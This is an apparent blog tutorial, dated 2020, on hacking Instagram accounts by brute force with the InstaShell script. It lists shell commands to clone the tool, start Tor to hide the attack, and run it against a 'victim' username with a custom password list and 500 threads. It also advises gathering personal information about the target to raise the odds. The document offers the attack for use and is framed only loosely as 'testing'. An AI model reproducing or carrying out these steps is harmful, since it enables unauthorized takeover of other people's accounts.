Hacking
August 24, 2020

How to Hack Instagram using InstaShell in 2020

Instashell is originally coded by thelinuxchoice

Try this for testing purpose only cause sometimes it’s no longer working :)

STEP 1

  • Open Terminal in Kali Linux and type following command to create and open new Directory
mkdir bruteforce
cd bruteforce

STEP 2

  • Clone InstaShell Source code from GitHub
  • It will download all Source code in your
git clone https://github.com/F33Z/instashell.git

STEP 3

  • It will create new Directory so let's open it by typing following command
cd instashell/

STEP 4

  • Change file permission using the following command
  • If you don’t change permission it won’t run
chmod +x ./instashell.sh

STEP 5

  • To do attack first it needs to start TOR service
  • To start TOR service type following command
service tor start

STEP 6

  • Let’s start Instagram password Brute Force attack
  • Type following command
./instashell.sh

STEP 7

  • Now enter victim Username, word list, and set Threads value
  • Create a custom password list for the victim using cupp
  • Or use default password list
  • In default password list it won’t work
  • The custom password list can increase chances
Username account: itmefeez
Password List: /root/pass.txt
Threads:  500

STEP 8

  • if you have perfect password list than it will guess password used by a victim
  • If the password list is larger than it will need more time passion

CONCLUSION

  • It won’t work all the time but having some information of victim can increase the success rate
  • Next, we learn how to generate custom password list using CUPP
  • Don’t forget to Spread The World